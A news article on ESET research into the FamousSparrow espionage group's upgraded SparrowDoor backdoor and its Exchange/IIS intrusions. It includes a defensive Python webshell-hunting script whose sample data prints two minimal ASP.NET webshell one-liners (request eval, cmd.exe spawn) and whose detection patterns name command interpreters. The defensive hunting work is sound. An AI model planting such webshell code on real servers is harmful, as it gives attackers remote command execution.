FamousSparrow Hackers Enhance Cyber Attacks with Modular Backdoor

A China-aligned cyberespionage group tracked as FamousSparrow has been observed using upgraded versions of its SparrowDoor backdoor in attacks against a United States-based trade organization, according to researchers at ESET. It is the first significant FamousSparrow activity documented since 2022, when the group last drew public scrutiny and then appeared to go quiet.

The same campaign also hit a research institute in Mexico and a government institution in Honduras. In the incidents ESET examined, initial access was most likely gained by exploiting outdated, internet-facing Windows Server and Microsoft Exchange Server installations; the attackers then dropped webshells on the IIS server to keep a foothold and stage further tooling. The patch level of externally exposed Exchange hosts, and any unexpected server-side script files in their IIS directories, are therefore the first things for defenders to check.
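The following is an added example, not part of the ESET research or of this article, of the kind of check the previous paragraph calls for: a small Python triage script that walks a file listing taken from an Exchange server's IIS-served directories and flags server-side script files that were written after the last patch baseline or that contain code idioms typical of one-line webshells. The file listing, the timestamps, the patch baseline date and the file contents are all constructed for illustration; in practice the listing would come from a tool such as Get-ChildItem -Recurse on the host, and the baseline would be the time the last Exchange update was applied.

```python
import re
from datetime import datetime, timezone
from typing import Dict, Optional

# Constructed sample listing (not real telemetry) of files under an Exchange
# server's IIS-served directories: (path, last-write time in UTC, leading content).
SAMPLE_FILES = [
    (r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",
     "2021-02-10T03:14:00Z",
     '<%@ Page Language="C#" Inherits="Microsoft.Exchange.HttpProxy.LogonPage" %>'),
    (r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\error.aspx",
     "2025-03-02T22:41:17Z",
     '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'),
    (r"C:\inetpub\wwwroot\aspnet_client\system_web\help.aspx",
     "2025-03-02T22:43:05Z",
     '<% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>'),
    (r"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\default.aspx",
     "2025-01-15T09:00:00Z",
     '<%@ Page Language="C#" Inherits="Microsoft.Exchange.Management.ControlPanel.DefaultPage" %>'),
    (r"C:\inetpub\wwwroot\iisstart.htm", "2019-11-30T00:00:00Z", "<html><body>IIS</body></html>"),
]

# Hypothetical baseline: when the last Exchange CU / security update was applied.
# Vendor files under these paths are written at install time, so anything newer
# deserves a look even if its name matches a legitimate page.
PATCH_BASELINE = datetime(2024, 12, 1, tzinfo=timezone.utc)

SERVER_SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".asax")

# Code idioms common in minimal ASP.NET webshells.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"eval\s*\(\s*Request", re.I), "eval() of request data"),
    (re.compile(r'"unsafe"', re.I), "JScript eval in unsafe mode"),
    (re.compile(r"System\.Diagnostics\.Process|Process\.Start\s*\(", re.I), "spawns a process"),
    (re.compile(r"cmd\.exe|powershell", re.I), "references a command interpreter"),
    (re.compile(r'Request(\.Item)?\[\s*"(cmd|pass|code|exec)"', re.I), "command/password parameter"),
]


def parse_utc(ts: str) -> datetime:
    """Parse an ISO-8601 timestamp with a trailing Z into an aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def assess(path: str, last_write: str, content: str) -> Optional[dict]:
    """Return a finding for one file, or None if it looks unremarkable."""
    if not path.lower().endswith(SERVER_SCRIPT_EXTENSIONS):
        return None
    reasons = []
    if parse_utc(last_write) > PATCH_BASELINE:
        reasons.append(f"written {last_write}, after the patch baseline")
    code_hits = [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(content)]
    reasons.extend(code_hits)
    if not reasons:
        return None
    # Shell-like code is the strong signal; a fresh timestamp alone is only a review item.
    severity = "high" if code_hits else "low"
    return {"path": path, "severity": severity, "reasons": reasons}


def hunt(files) -> Dict[str, dict]:
    """Run assess() over a listing and return the findings keyed by path."""
    findings = {}
    for path, last_write, content in files:
        finding = assess(path, last_write, content)
        if finding:
            findings[path] = finding
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_FILES).values():
        print(f"[{finding['severity']}] {finding['path']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

On the constructed listing the two planted shells are rated high, the legitimately updated ecp page is rated low because only its timestamp is newer than the baseline, and the untouched vendor page and the static .htm file are not reported. The timestamp check is what catches a shell that reuses a legitimate file name; the content patterns are what separates it from a genuine post-baseline update, so a real hunt should still open every low-severity hit and compare it against a clean install.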

ESET's analysis identified two previously undocumented versions of SparrowDoor, both showing clear improvements in code quality and architecture over the samples described in 2022. Alongside changes to configuration encryption and persistence, the most significant new feature is parallel command execution: previously, a long-running task such as a file transfer or an interactive shell would block the backdoor until it finished, whereas the new versions run such tasks on their own threads, so the operator can keep issuing commands while the long task is still in progress.

The newer of the two versions is also modular: rather than carrying every capability in the main binary, it loads plugins delivered by the command-and-control (C2) server at runtime. The plugins observed add keylogging, proxying, file transfer and process manipulation, among other functions. Researchers read FamousSparrow's use of the ShadowPad remote access trojan (RAT), a privately distributed backdoor shared among several China-aligned groups, as a sign that the group now has access to tooling typically reserved for Chinese state-aligned actors.

This has sharpened concern about FamousSparrow and the groups around it. Microsoft folds FamousSparrow into a broader threat cluster it tracks as Salt Typhoon, while ESET continues to treat it as a distinct group with only loose links to the others. The overlaps in infrastructure and tooling that the evidence does show point to a shared supply chain for malware and services rather than proving a single operator. For defenders the practical consequence is the same either way: indicators and techniques published for one of these groups should be assumed to apply to the others, across the sectors and regions they target.